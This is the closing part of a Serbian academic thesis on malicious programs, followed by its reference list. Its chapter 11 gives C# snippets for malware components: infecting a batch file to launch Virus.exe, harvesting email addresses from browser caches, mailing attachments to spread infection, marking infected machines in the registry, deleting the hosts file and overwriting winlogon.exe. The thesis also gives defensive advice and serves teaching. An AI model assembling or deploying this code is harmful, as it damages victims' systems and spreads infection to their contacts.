podizanju sistema. Drugi način za širenje infekcije na računaru predstavlja izmena pos
tojećih datoteka, dodavanjem novih linija. Za tu priliku se moţe koristiti funkcija
WriteLine standardne sistemske UI biblioteke, čiji primer korišćenja se moţe videti u ko
du ispod.
S t r a n a | 60
using System.IO; ... //Definisanje funkcionalnosti koja se dodaje string lines =
"\r\nSTART /MAX C:\\Virus.exe"; //Orvaranje fajla koji se želi izmeniti StreamWri
ter file = new StreamWriter("c:\\dir1\\test.bat", true); //Upisivanje stringa na
kraju fajla file.WriteLine(lines); //Zatvaranje fajla file.Close();
Aplikacija koja bi sadrţala ovaj kod bi izmenila test.bat datoteku tako da se nako
n izvršenja svih legitimnih funkcionalnosti ove datoteke, pokrene još Virus.exe apli
kacija. Više informacija o izmeni datoteka moguće je pronaći na adresi [74], a informa
cije o radu sa batch fajlovima na adresi [75].
11.4 Upotreba elektronske pošte kao sistema prenosa
Najbitnija stavka vezana za uspeh nekog zlonamernog programa jeste njegova sposo
bnost prenosa. Programi koji koriste dostupnije metode prenosa imaju veće šanse za u
speh. Upotreba elektronske pošte, kao najrasprostranjenijeg servisa na Internetu,
pokazala se kao najuspešniji kanal za brzo širenje zlonamernih programa. Potraga za
e-mail adresama na računaru domaćinu se moţe vršiti na više načina. Kod u nastavku za tu sv
hu koristi tekstualne datoteke (u ovom slučaju *.html stranice). Ovo predstavlja j
ako koristan vid pretrage, sa obzirom na to da su stranice koje sadrţe adrese kori
snika često dostupne na Internetu. Ukoliko ih je korisnik posetio, one će ostati sačuv
ane u istorijatu Internet pretraţivača (npr. Temporary Internet Files).
using System.IO; using System.Text.RegularExpressions; ... private static void F
indEmails(List<string> directoryList) { foreach (string cDirs in directoryList)
{ if (Directory.Exists(cDirs)) { // Pronalženje svih fajlova sa ekstenzijom html s
tring[] htmlFiles = Directory.GetFiles(cDirs, "*html"); foreach (string htmlFile
in htmlFiles) { // Kreiranje regularnog izraza (eMail) Regex hRegex = new Regex
( S t r a n a | 61
"[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+"); // Otvaranje strima za čitanj
e fajla FileStream inFile = new FileStream(htmlFile, FileMode.Open, FileAccess.R
ead); // Čitanje html fajla byte[] source = new byte[inFile.Length]; inFile.Read(s
ource, 0, (int)inFile.Length); inFile.Close(); // Traženje poklapanja foreach (Mat
ch strMatch in hRegex.Matches(Encoding.ASCII.GetString(source))) { if (strMatch.
Success) { string t = strMatch.Value; // Slanje pošte, upis u fajl... } } } } } }
Funkcija FindEmails radi tako što za primljenu listu direktorijuma vrši pretragu za
datotekama sa ekstenzijom html. Promenljiva hRegex definiše šablon po kojem će se izvrši
ti pretraga, u ovom slučaju se radi o e-mail regularnom izrazu. Ukoliko su pronaĎene
datoteke sa ekstenzijom html, otvaraju se i njihov sadrţaj se poredi sa hRegex re
gularnim izrazom. Rezultat strMatch.Value predstavlja pronaĎenu e-mail adresu, koj
a se dalje moţe sačuvati u nekoj tekstualnoj datoteci ili koristiti za slanje. Više in
formacija o tome kako se koristi System.Text.RegularExpressions biblioteka moguće
je pronaći na zvaničnom Mictrosoft MSDN sajtu, na adresi [76]. Funkcija FindEmails s
e moţe pozvati na sledeći način:
List<string> directoryList = new List<string>(); directoryList.Add("C:\Users\Gor
anPanic\AppData\Local\Microsoft\ Windows\Temporary Internet Files"); FindEmails(
directoryList);
Ukoliko je zlonamerna aplikacija pronašla neku e-mail adresu, moţe se izvršiti dalje šir
enje infekcije (u slučaju virusa ili crva), slanjem inficirane aplikacije na pronaĎe
ne adrese. Ako se radi o trojanskom zlonamernom kodu tada se najčešće vrši dostavljanje
adresa osobi koja je postavila trojanca.
using System.Runtime.InteropServices; using System.Net.Mail; ...
S t r a n a | 62
private static void SendMail(string MailAddressTo, string MailAddressFrom, strin
g Subject, string Body, Attachment[] att, string SmtpClient, int port) { MailMes
sage message = new MailMessage(); message.To.Add(MailAddressTo); message.Subject
= Subject; message.From = new MailAddress(MailAddressFrom); foreach(Attachment
item in att) { message.Attachments.Add(item); } message.Body = Body; SmtpClient
smtp; if (port > 0) { smtp = new SmtpClient(SmtpClient); } else { smtp = new Smt
pClient(SmtpClient,port); } smtp.Send(message); }
Funkcija SendMail predstavlja primer metode za slanje elektronske pošte. Više detalj
a o funkcionisanju klase System.Net.Mail.MailMessage moguće je pronaći na Mictrosoft
MSDN sajtu, na adresi [77].
11.5 Potpisivanje – Registry baza
Da bi se izbeglo višestruko inficiranje istog računara, zlonamerni programi često osta
vljaju svoj potpis u registry bazi. Kada se aplikacija ponovo startuje, program će
izvršiti pretragu po svom ključu. Pronalaţenje takvog kluča značiće da je računar već infi
, a dalje izvršenje će biti prilagoĎeno trenutnoj situaciji. U nastavku je dat kod fun
kcije koja vrši kreiranje novog ključa u bazi.
using Microsoft.Win32; ... public static void SetRegistryKey() { Registry.Curren
tUser.DeleteSubKey("GoranExample", false); RegistryKey rk = Registry.CurrentUser
.CreateSubKey("GoranExample"); rk.SetValue(keyName, "The path is %PATH%"); }
Više informacija o funkcijama za kreiranje klučeva SetValue [78] i njihovo čitanje Get
Value [79] moguće je pronaći na Microsoft MSDN sajtu.
S t r a n a | 63
Slika 11.3 Dodati ključ u Registry bazi
11.6 Destruktivno ponašanje
Glavni razlog zbog čega se korisnici računara plaše zlonamernih programa je njihovo de
struktivno ponašanje. Ubijanje procesa se sprovodi kada se ţeli onemogućiti rad neke a
plikacije na računaru. Ovakav vid napada najčešće ne nanosi trajnu štetu, ali moţe da onemo
ući dalji rad na inficiranom računaru. Primer takvog koda opisan je u poglavlju 11.2
, a opis rada sa procesima se moţe pronaći na adresi [72]. Ukidanje procesa se često k
oristi u kombinaciji sa meračem vremena, koji po okidanju ubija slučajno odabran akt
ivan proces. Posle odreĎenog broja iteracija dolazi do rušenja operativnog sistema.
Brisanje datoteka spada u najopasnije primere destruktivnog ponašanja. Funkcija Sy
stem.IO.File.Delete [80] omogućava brisanje datoteka.
using System.IO; ... File.Delete(@"C:\WINDOWS\system32\drivers\etc\hosts");
Zamena datoteke [73] se radi kada je potrebno izvršiti podmetanje zlonamernog prog
ram.
using System.IO; ... File.Copy(Application.ExecutablePath, System.Environment.Sy
stemDirectory + @"\winlogon.exe");
S t r a n a | 64
11.7 Preporuke
Kombinacijom navedenog koda mogu se kreirati zlonamerni programi koji bi pripada
li grupi virusa, crva ili trojanaca. Upotreba C# koda i .NET tehnologija u kreir
anju zlonamernog koda je generalno loša ideja. Aplikacije su često prevelike u poreĎen
ju sa aplikacijama koje nastaju u manje kompleksnim programskim jezicima. Razvoj
u .NET framework-u je drugi ograničavajući faktor, iz razloga što bi takav zlonameran
program radio samo na računarima na kojima je takav framework instaliran. U cilju
smanjenja korišćenih resursa, tvorci zlonamernih programa često izbegavaju upotrebu r
ukovanja izuzecima [81]. Takav vid nebrige o inficiranom računaru često je glavni kr
ivac za pojavu slučajne štete pri izvršenju malicioznog koda. Zaštita od programa koji b
i bili kreirani upotrebom navedenog koda svodi se na prevenciju. Korisnik treba
sam da vodi računa o tome koje programe pokreće na računaru. Anti-virusni programi će zl
onameran program sa sigurnošću detektovati kao opasnost samo u slučaju kada njegova de
finicija već postoji u bazi antivirusa. Na heurističke metode se ne bi smelo oslanja
ti. Ako se već vrši pokretanje sumnjive aplikacije poţeljno je da se to učini bez upotre
be administratorskih privilegija. Pokretanje programa sa smanjenim privilegijama
će onemogućiti izmenu i brisanje podataka, kako datoteka na disku tako i vrednosti
u registry bazi. Pristupanje nekim resursima internet pretraţivača, radi pronalaţenja
meilova, će uglavnom biti onemogućeno. TakoĎe blokiranje aktivne zaštite ukidanjem proce
sa ili izmenom setovanja će biti dodatno oteţano.
S t r a n a | 65
12. ZAKLJUČAK
Uporedo sa razvojem računara dolazi do razvoja zlonamernih programa. Stvar koja je
najviše podstakla razvoj i širenje ovih programa je računarska mreţa. Pre pojave umreţeni
h računara, jedini način prenosa zlonamernih programa je bio putem zaraţene diskete, t
e su takvi programi imali neuporedivo manje šansi za dalje širenje. Dolaskom Interne
ta i servisa poput elektronske pošte, mogućnosti prenosa zlonamernih programa drastičn
o rastu. Oni su ubrzo počeli da se šire mnogo većom brzinom i da koriste sofisticirani
je načine prenosa. Kako je broj računara sa pristupom Internetu rastao, a Internet p
ostajao sve više globalna mreţa, tako su i infekcije bile sve ozbiljnije i najčešće global
nog tipa. RaĎaju se novi tipovi zlonamernih programa, kojima više nije glavni cilj n
anošenje štete drugim korisnicima, već prikupljanje ili kraĎa informacija od istih. Upot
reba Interneta u obavljanju finansijskih transakcija, dovodi do pojave novog vid
a kriminala, elektronskog kriminala. Zlonamerni programi poput trojanskih konja
i rootkit-a predstavljaju glavno oruţje u rukama tehnološki visoko obučenih kriminalac
a. Činjenica je da zlonamerni programi postoje i na to se dalje ne moţe uticati. Jed
ino što je moguće u ovakvoj situaciji je pronalaţenje načina zaštite od takvih programa. N
ajefikasniji način zaštite je upotreba nekog antivirusnog paketa. Pored operativnog
sistema, antivirusni paket je druga obavezna komponenta savremenog računara. Koris
nici koji drţe do svoje bezbednosti, moraju posvetiti vreme odabiru za njihove pot
rebe najboljeg antivirusnog paketa i njegovom pravilnom konfigurisanju. Virusi,
crvi i ostali nepoţeljni programi se pojavljuju svakodnevno. Svaki korisnik, bez o
bzira na njegovu stručnost, je u stanju da uz pomoć alata za generisanje zlonamernog
koda napravi svoj primerak takvog programa. Jedini način da se sa sigurnošću zaključi k
oji je program maliciozan, je detekcija takvog koda na osnovu potpisa. Za tako n
ešto je neophodno da se definicija virusa nalazi u bazi antivirusnog paketa. Nered
ovno osveţavanje baze virusa najnovijim definicijama virusa, ima za posledicu slab
ljenje odbrambenog sistema antivirusnog programa. Trenutno najveća briga korisnika
koji poseduju redovno aţuriran antivirusni program na svom računaru, predstavljaju
sam operativni sistem i loše implementirane aplikacije. Rešenje ovog problema se svo
di na instaliranje najnovijih bezbednosnih zakrpa za operativni sistem i ostale
loše implementirane programe koje korisnik ima instalirane na svom računaru. Dobro k
onfigurisan firewall će predstavljati dodatnu prepreku za sve vrste malicioznih pr
ograma. TakoĎe, njegova loša konfiguracija moţe doneti više štete nego koristi. Iz ovoga m
oţemo videti da je poţeljna zaštita u slojevima. Veći broj slojeva oteţava posao zlonamern
im programima, a time smanjuje mogućnost infekcije.
S t r a n a | 66
Na osnovu svega iznesenog nije teško zaključiti da apsolutne zaštite od zlonamernih pr
ograma nema, a da li će je biti ostaje da se vidi.
S t r a n a | 67
13. LITERATURA
Reference
Stallings, W. (2007), “Network Security Essentials - Applications and Standards 3t
h edition“, Upper Saddle River, New Jersey. Pleskonjić, D., Maček, N., ĐorĎević, B. i Carić
. (2007), “Sigurnost računarskih sistema i mreţa”, Mikro knjiga, Beograd. Ţdrnja, B. (2003
), “Šta su i kako rade virusi”, Prvi korak, Zagreb. Bubanja, B. (2009), “Antivirusni pak
eti”, Svet Kompjutera, 1. jun, str. 60 – 63.
Web stranice
[1] Wikipedia, Computer virus, dostupno na: http://en.wikipedia.org/wiki/Compute
r_virus (pregledano 3. januara 2010.) [2] Wikipedia, Computer worm, dostupno na:
http://en.wikipedia.org/wiki/Computer_worm (pregledano 3. januara 2010.) [3] Wi
kipedia, Trojan horse (computing), dostupno na: http://en.wikipedia.org/wiki/Tro
jan_horse_(computing) (pregledano 3. januara 2010.) [4] Wikipedia, Logic bomb, d
ostupno na: http://en.wikipedia.org/wiki/Logical_bomb (pregledano 3. januara 201
0.) [5] Wikipedia, Denial-of-service attack, dostupno na: http://en.wikipedia.or
g/wiki/Denial-of-service_attack (pregledano 3. januara 2010.) [6] Wikipedia, Spy
ware, dostupno na: http://en.wikipedia.org/wiki/Spyware (pregledano (pregledano
04. januara 2010.) [7] Wikipedia, Adware, dostupno na: http://en.wikipedia.org/w
iki/Adware (pregledano 04. januara 2010.) [8] Wikipedia, Rootkit, dostupno na: h
ttp://en.wikipedia.org/wiki/Rootkit (pregledano 13. januara 2010.) [9] Wikipedia
, Brain (computer virus), dostupno na: http://en.wikipedia.org/wiki/Brain_(compu
ter_virus) (pregledano 7. januara 2010.) [10] Wikipedia, Stoned (computer virus)
, dostupno na: http://en.wikipedia.org/wiki/Stoned_virus (pregledano 7. januara
2010.) [11] Wikipedia, Cascade (computer virus), dostupno na: http://en.wikipedi
a.org/wiki/Cascade_virus (pregledano 12. januara 2010.) [12] Wikipedia, Morris w
orm, dostupno na: http://en.wikipedia.org/wiki/Morris_Worm (pregledano 12. janua
ra 2010.) [13] CERT, dostupno na: http://www.cert.org (pregledano 12. januara 20
10.)
S t r a n a | 68
[14] Wikipedia, AIDS (trojan horse), dostupno na: http://en.wikipedia.org/wiki/A
IDS_(trojan_horse) (pregledano 12. januara 2010.) [15] Wikipedia, AIDS (computer
virus), dostupno na: http://en.wikipedia.org/wiki/AIDS_(computer_virus) (pregle
dano 12. januara 2010.) [16] European Institute for Computer Anti-Virus Research
(EICAR), dostupno na: http://www.eicar.org (pregledano 20. marta 2010.) [17] Wi
kipedia, Virus Creation Laboratory, dostupno na: http://en.wikipedia.org/wiki/Vi
rus_Creation_Laboratory (pregledano 14. januara 2010.) [18] Wikipedia, Hoax, dos
tupno na: http://en.wikipedia.org/wiki/Hoax (pregledano 14. januara 2010.) [19]
Wikipedia, CIH (computer virus), dostupno na: http://en.wikipedia.org/wiki/CIH_V
irus (pregledano 14. januara 2010.) [20] Wikipedia, SQL slammer (computer worm),
dostupno na: http://en.wikipedia.org/wiki/SQLSlammer (pregledano 14. januara 20
10.) [21] Wikipedia, Fred Cohen, dostupno na: http://en.wikipedia.org/wiki/Fred_
Cohen (pregledano 14. januara 2010.) [22] Wikipedia, Polymorphic code, dostupno
na: http://en.wikipedia.org/wiki/Polymorphic_virus (pregledano 19. marta 2010.)
[23] Wikipedia, Bliss (virus), dostupno na: http://en.wikipedia.org/wiki/Bliss_(
virus) (pregledano 20. marta 2010.) [24] Wikipedia, Macro virus (computing) , do
stupno na: http://en.wikipedia.org/wiki/Macro_virus_(computing) (pregledano 16.
januara 2010.) [25] Wikipedia, Melissa (computer worm), dostupno na: http://en.w
ikipedia.org/wiki/Melissa_(computer_worm) (pregledano 16. januara 2010.) [26] Wi
kipedia, Dark Avenger, dostupno na: http://en.wikipedia.org/wiki/Dark_Avenger (p
regledano 16. januara 2010.) [27] Wikipedia, ILOVEYOU, dostupno na: http://en.wi
kipedia.org/wiki/ILOVEYOU (pregledano 20. marta 2010.) [28] Wikipedia, Anna Kour
nikova (computer virus), dostupno na: http://en.wikipedia.org/wiki/Anna_Kourniko
va_(computer_virus) (pregledano 17. januara 2010.) [29] Wikipedia, SQL slammer (
computer worm), dostupno na: http://en.wikipedia.org/wiki/SQL_Slammer (pregledan
o 14. februar 2010.) [30] SQL slammer, dostupno na: http://www.muscetta.org/rese
arch/worms/index.php (pregledano 14. januara 2010.) [31] Wikipedia, Easter egg (
media), dostupno na: http://en.wikipedia.org/wiki/Easter_egg_(virtual) (pregleda
no 20. marta 2010.)
S t r a n a | 69
[32] Wikipedia, Easter eggs in Microsoft products, dostupno na: http://en.wikipe
dia.org/wiki/Easter_eggs_in_Microsoft_products (pregledano 27. januara 2010.) [3
3] MX Lab, Microsoft Security Bulletin with attached executable is malware with
a nasty twitch, dostupno na: http://blog.mxlab.eu/2009/10/05/microsoft-securityb
ulletin-with-attached-executable-is-malware-with-a-nasty-twitch (pregledano 20.
marta 2010.) [34] Wikipedia, Backdoor (computing), dostupno na: http://en.wikipe
dia.org/wiki/Backdoor_(computing) (pregledano 21. januara 2010.) [35] Wikipedia,
Back Orifice, dostupno na: http://en.wikipedia.org/wiki/Back_Orifice (pregledan
o 21. januara 2010.) [36] Wikipedia, Back Orifice 2000, dostupno na: http://en.w
ikipedia.org/wiki/Back_Orifice_2000 (pregledano 21. januara 2010.) [37] Sourcefo
rge, BO2K , dostupno na: http://sourceforge.net/project/screenshots.php?group_id
=4487 (pregledano 20. marta 2010.) [38] Wikipedia, NetBus, dostupno na: http://e
n.wikipedia.org/wiki/NetBus (pregledano 25. januara 2010.) [39] Cine movie pirat
e, Online hackers, dostupno na: http://cinemoviepirate.blogspot.com/2009_11_01_a
rchive.html (pregledano 21. marta 2010.) [40] Wikipedia, JavaScript, dostupno na
: http://en.wikipedia.org/wiki/JavaScript (pregledano 25. januara 2010.) [41] Wi
kipedia, ActiveX, dostupno na: http://en.wikipedia.org/wiki/ActiveX (pregledano
25. januara 2010.) [42] MSDN, VBScript, dostupno na: http://msdn.microsoft.com/e
nus/library/t0aew7h6(VS.85).aspx (pregledano 25. januara 2010.) [43] Wikipedia,
VBScript, dostupno na: http://en.wikipedia.org/wiki/VBScript (pregledano 25. jan
uara 2010.) [44] Wikipedia, Kak worm, dostupno na: http://en.wikipedia.org/wiki/
Kak_worm (pregledano 25. januara 2010.) [45] Lavasoft, Ad-Aware, dostupno na: ht
tp://www.lavasoft.com (pregledano 17. marta 2010.) [46] Wikipedia, Rootkit, dost
upno na: http://en.wikipedia.org/wiki/Rootkit (pregledano 20. marta 2010.) [47]
Rootkit, dostupno na: http://www.rootkit.com (pregledano 15. januara 2010.) [48]
Wikipedia, DLL injection, dostupno na: http://en.wikipedia.org/wiki/DLL_injecti
on (pregledano 15. januara 2010.) [49] Wikipedia, Hooking, dostupno na: http://e
n.wikipedia.org/wiki/Hooking (pregledano 15. januara 2010.)
S t r a n a | 70
[50] AFX Windows Rootkit 2003, dostupno na: http://www.megasecurity.org/trojans/
a/aphex/Afx_win_rootkit2003.html (pregledano 16. januara 2010.) [51] F-Secure, B
lackLight, dostupno na: http://www.f-secure.com/en_EMEA/products/technologies/bl
acklight (pregledano 21. marta 2010.) [52] Windows Sysinternals, RootkitRevealer
, dostupno na: http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx (pr
egledano 24. januara 2010.) [53] Chkrootkit, dostupno na: http://www.chkrootkit.
org (pregledano 26. januara 2010.) [54] Wikipedia, Antivirus software, dostupno
na: http://en.wikipedia.org/wiki/Antivirus (pregledano 26. januara 2010.) [55] C
onwex Net, Sigurnost računarskih mreţa, dostupno na: http://www.conwex.info/draganp/
SRM_Predavanje_7.pdf (pregledano 18. januara 2010.) [56] Wikipedia, Heuristic al
gorithm, dostupno na: http://en.wikipedia.org/wiki/Heuristic_algorithm (pregleda
no 18. januara 2010.) [57] Svet Kompjutera, Antivirusni paketi, dostupno na: htt
p://www.sk.rs/2009/06/sktr04.html (pregledano 5. aprila 2010.) [58] Wikipedia, F
irewall (computing), dostupno na: http://en.wikipedia.org/wiki/Firewall_(computi
ng) (pregledano 18. januara 2010.) [59] Wikipedia, Anti-spam techniques, dostupn
o na: http://en.wikipedia.org/wiki/Antispam (pregledano 23. januara 2010.) [60]
Wikipedia, Internet security, dostupno na: http://en.wikipedia.org/wiki/Internet
_security (pregledano 23. januara 2010.) [61] Kaspersky, Internet Security 2010,
dostupno na: http://www.kaspersky.com/kaspersky_internet_security (pregledano 1
9. mart 2010.) [62] AVG, AVG Internet Security, dostupno na: http://www.avg.com/
ww-en/avginternet-security-network-edition (pregledano 26. januara 2010.) [63] B
itDefender, BitDefender Internet Security, dostupno na: http://www.bitdefender.r
s/site/IS-2010.php (pregledano 18. marta 2010.) [64] ESET, ESET Smart Security 4
, dostupno na: http://www.eset.com/home/smartsecurity (pregledano 25. januara 20
10.) [65] Norton from Symantec, Norton™ Internet Security 2010, dostupno na: http:
//www.symantec.com/en/uk/norton/internet-security (pregledano 18. marta 2010.) [
66] F-Secure, F-Secure Internet Security 2010, dostupno na: http://www.fsecure.c
om/en_EMEA/products/home-office/internet-security (pregledano 18. marta 2010.)
S t r a n a | 71
[67] MSDN, Visual C# Developer Center, dostupno na: http://msdn.microsoft.com/en
-us/vcsharp/aa336809.aspx (pregledano 21. marta 2010.) [68] Microsoft, Microsoft
.NET Framework 3.5, dostupno na: http://www.microsoft.com/downloads/details.asp
x?FamilyId=333325FD-AE52-4E35B531-508D977D32A6&displaylang=en (pregledano 21. ma
rta 2010.) [69] Microsoft, Visual Studio, dostupno na: http://msdn.microsoft.com
/enus/vstudio/default.aspx (pregledano 18. marta 2010.) [70] MSDN, ShowWindow Fu
nction, dostupno na: http://msdn.microsoft.com/enus/library/ms633548(VS.85).aspx
(pregledano 9. marta 2010.) [71] MSDN, FindWindow Function , dostupno na: http:
//msdn.microsoft.com/enus/library/ms633499(VS.85).aspx (pregledano 9. marta 2010
.) [72] MSDN, Process Class, dostupno na: http://msdn.microsoft.com/enus/library
/system.diagnostics.process.aspx (pregledano 11. marta 2010.) [73] MSDN, File.Co
py Method, dostupno na: http://msdn.microsoft.com/enus/library/system.io.file.co
py.aspx (pregledano 11. marta 2010.) [74] MSDN, Code: Writing to a Text File (Vi
sual C#), dostupno na: http://msdn.microsoft.com/en-us/library/aa287548(VS.71).a
spx (pregledano 12. marta 2010.) [75] Computer Hope, Information on batch files,
dostupno na: http://www.computerhope.com/batch.htm (pregledano 11. marta 2010.)
[76] MSDN, Regex Class, dostupno na: http://msdn.microsoft.com/enus/library/sys
tem.text.regularexpressions.regex.aspx (pregledano 12. marta 2010.) [77] MSDN, M
ailMessage Class, dostupno na: http://msdn.microsoft.com/enus/library/system.net
.mail.mailmessage.aspx (pregledano 14. marta 2010.) [78] MSDN, Registry.GetValue
Method, dostupno na: http://msdn.microsoft.com/enus/library/microsoft.win32.reg
istry.getvalue.aspx (pregledano 15. marta 2010.) [79] MSDN, RegistryKey.SetValue
Method, dostupno na: http://msdn.microsoft.com/en-us/library/2kk9bxk9.aspx (pre
gledano 15. marta 2010.) [80] MSDN, File.Delete Method, dostupno na: http://msdn
.microsoft.com/enus/library/system.io.file.delete.aspx (pregledano 11. marta 201
0.) [81] MSDN, Exception Handling Statements (C# Reference), dostupno na: http:/
/msdn.microsoft.com/en-us/library/s7fekhdy.aspx (pregledano 18. marta 2010.)
S t r a n a | 72

Zlonamerni Programi Goran Panić

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Zlonamerni Programi Goran Panić

Uploaded by

Copyright:

Available Formats

Univerzitet u Novom Sadu Prirodno – matematički fakultet Departman za matematiku i i

Digitalni potpis (engl. Digital Signatures) sluţi za utvrĎivanje besprekornosti info

You might also like